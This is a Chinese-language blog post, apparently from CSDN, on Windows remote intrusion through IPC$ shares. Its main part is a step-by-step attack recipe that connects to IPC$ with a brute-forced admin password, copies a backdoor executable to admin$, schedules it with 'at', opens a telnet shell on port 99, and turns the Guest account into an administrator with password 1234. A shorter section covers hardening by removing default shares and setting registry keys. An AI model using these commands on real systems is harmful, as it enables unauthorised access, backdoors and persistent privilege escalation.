Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)

最新推荐文章于 2024-05-26 08:15:00 发布
最新推荐文章于 2024-05-26 08:15:00 发布
阅读量6.7k 收藏 42
点赞数 5
分类专栏: Windows基础 渗透测试基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37077262/article/details/103979530
版权

一、经典IPC$入侵

利用ipc$和默认共享入侵远程电脑的过程

1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名"

一般通过扫描弱口令来得到管理员帐号和密码

 

2. C:\> copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

 

3. C:\> net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是2004/6/15上午11:00。

 

4. C:\>at \127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧

 

5. C:\> net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1的当前时间是2004/6/15 上午11:05, 那就准备开始下面的命令。

 

6. C:\>telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell.

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

 

7.C:\> copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上。

 

8. C:\WINNT\system32> ntlm

在对方计算机运行ntlm,当出现"DONE的时候,就说明已经启动正常。然后使用"net starttelnet"来开启Telnet服务!

 

9. Telnet 127.0.0.1, 接着输入用户名与密码就进入对方了,***作就像在DOS上****作一样简单!

 

10. C:\> net user guest /active:yes将对方的Guest用户激活。

 

11. C:\> net user guest 1234 &net localgroup administrators guest /add

将Guest的密码改为1234,将Guest变为Administrator.

 

防止别人用ipc$和默认共享入侵

1. 先把已有的默认共享删除(有几个删几个)

net share ipc$ /del

net share admin$ /del

net share c$ /del

 

2. 禁止建立空连接 首先运行regedit,找到如下主键

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ControlLSA]把RestrictAnonymous (DWORD)的键值改为: 00000001。

 

3. 禁止自动打开默认共享 对于server版,找到如下主键

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServerParameters]

把AutoShareServer (DWORD)的键值改为:00000000。

对于pro版,则是

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServerParameters]

把AutoShareWks (DWORD)的键值改为,00000000.

如果上面所说的主键不存在,就新建一个再改键值。

最低0.47元/天 解锁文章
LKmnbZ
关注
  • 5
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
弱口令(Weak Password)总结和爆破工具
cc123489ll的博客
05-17 839
网站管理、运营人员由于安全意识不足,为了方便、避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等。攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。
IPC$入侵攻略
河北正定欢迎您-少占鱼
10-23 1127
一份详尽的IPC$入侵资料利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认
Windows远程连接命令
最新发布
2301_78526531的博客
05-26 832
Windows操作系统提供了多种命令使用户可以通过到远程计算机,并在远程操作系统上执行操作。命令可方便实现远程工作、故障排查和系统维护等任务。本文将介绍几种常见的Windows命令及其基本使用方法。
横向移动检测之远程执行(四)WMI/WMIC
qq_27828281的博客
12-13 4623
横向移动——WMI/WMIC远程执行分析及溯源
横向远程命令执行——WMIC
SheXinK’s Blog
12-28 4951
横向命令执行——WMI1、 测试环境   WMI是一项核心的Windows管理技术,WMI作为一种规范和基础结构,通过它可以访问、配置、管理和监视几乎所有的Windows资源,比如用户可以在远程计算机器上启动一个进程;设定一个在特定日期和时间运行的进程;远程启动计算机;等等。WMIWindows操作系统默认安装且开放服务端口135,而且执行过程在内存中进行,不会留下任何痕迹。 1、 测试环境  ...
WMI远程访问问题解决方法
qq_38472451的博客
05-03 837
WMI远程访问问题解决方法
wmic的文件使用详解
04-29 2267
 执行wmic命令启动WMIC命令行环境。这个命令可以在XP或 .NET Server的标准命令行解释器(cmd.exe)、Telnet会话或“运行”对话框中执行。这些启动方法可以在本地使用,也可以通过.NET Server终端服务会话使用。   第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC命令行提示符。在WMIC命令行提示符上,命令以交互的方式
dos-shell.zip_cmd执行命令_dos shell 编程_远程DOS_远程执行 cmd
09-21
不过,这些方法的安全性较低,现在更常见的是使用Powershell Remoting或第三方工具PsExec,它们提供更安全的远程命令执行环境。 在实际应用中,编写自己的远控程序是一种更高级的技术。这可能涉及到网络编程,如...
windows远程控制基本命令
01-21
Windows操作系统中,远程控制是一项重要的功能,它允许用户通过网络连接到另一台计算机并进行操作,例如管理、故障排查或协作。掌握一些基础的远程控制命令是IT管理员和技术支持人员必备的技能。本文将详细介绍...
windows实现远程登录目标服务器并自动启动程序
05-30
在这个示例中,我们可能会用到Powershell RemotingPsExec工具,这两个工具允许我们通过命令远程执行命令。 1. **Powershell Remoting**: - 开启远程Powershell:在目标服务器上,打开PowerShell并执行`Enable...
PsTools工具用于删除注册表远程主机控制
05-24
使用Psexec时,需要指定远程计算机的名称、要执行命令以及任何相关的参数。 **Preg工具** Preg是PsTools中的另一个实用工具,专门用于处理注册表操作。它可以读取、写入、删除和比较注册表项。如果你需要删除...
PAExec:远程执行,如PsExec
04-29
PAExec是免费的,可重新分发的开源软件,等效于Microsoft流行的PsExec应用程序: 文献资料 PAExec主页显示所有命令行选项。 执照 基本上,任何人都可以将该软件用于私人,公共或商业用途,包括将其用作分布式商业...
windows开启远程Wmi服务支持
墨鱼菜鸡
09-09 507
wmi不仅支持本地也同样支持远程,这里介绍一下怎么快速的让当前操作系统开启远程服务。 首先这里以windwos7为例,有的朋友说,开启远程wmi没有,我说这个东西有用,他说没有用,我说小伙子还是太年轻了。这里需要当前用户是管理员权限的,当然默认的登陆用户都是管理员的,但是存在着像我一样的懒人,不给虚拟机的windows设置密码,这样是不行的,需要给当然...
Windows远程执行进程工具psexecwmiexec介绍
测试开发小记
05-08 3458
在自动化测试或者自动化工具开发中,通常需要向其它电脑或者服务器发送指令,比如Windows发送命令到Linux服务器开启某个服务进程,或者读取状态信息,我们可以使用ssh协议实现。如果Windows主机需要发送命令到局域网内的其它Windows电脑要如何实现呢?在网络安全中称为横向移动的内网渗透方法可实现远程执行命令,横向移动工具有很多,本文介绍psexecwmiexec这两个工具如何实现远程执行进程。
WMI 远程连接问题解决方法
狩猪逮兔的专栏
09-07 2725
由于需要用取得远程计算机的信息,采用了WMI的方法来解决,但在应用时遇到了一些连接问题。程序时候是用C#来写的。 目标机和客户机都是运行的XP系统 连接部分的代码如下:             ConnectionOptions option = new Connectio
渗透测试学习大纲
YYY_0612的博客
07-02 1146
渗透学习大纲
[网络安全自学篇] 四十三.恶意样本原理及远程服务器IPC$安全缺陷解析
热门推荐
杨秀璋的专栏
01-30 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了DNS欺骗(DNS投毒)及钓鱼网站原理知识,并通过Ettercap工具复现某购物网站的钓鱼漏洞。本文将详细讲解木马原理知识,并通过远程服务器IPC $ 漏洞实现木马植入及控制远程服务器。希望这篇基础文章对您有所帮助,更希望大家提高安全意识,学会相关防范,也欢迎大家讨论。
剑走偏锋--使用WMI获取远程计算机进程程序集中查毒病毒打造内网安全环境
04-09 1090
剑走偏锋-使用WMI获取远程计算机进程程序 集中查毒病毒打造内网安全环境 作者:高玉涵 时间:2019.04.1815:45 博客:blog.csdn.net/cg_i 作者背景环境参见: 《由永恒之蓝病毒引发的运维安全思考——网络边界防御篇 》 《非常运维 一体化终端安全管理系统自动安装脚本详解》 TMOTWTDI-- Perl名言 真正见功夫的地方不在于代码本...
windows远程命令
07-25
Windows远程命令可以通过使用远程桌面协议(RDP)或使用命令工具进行执行。以下是一些常用的远程命令: 1. 使用远程桌面连接(RDP):使用Windows远程桌面连接工具可以远程连接到其他计算机,并在远程计算机上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值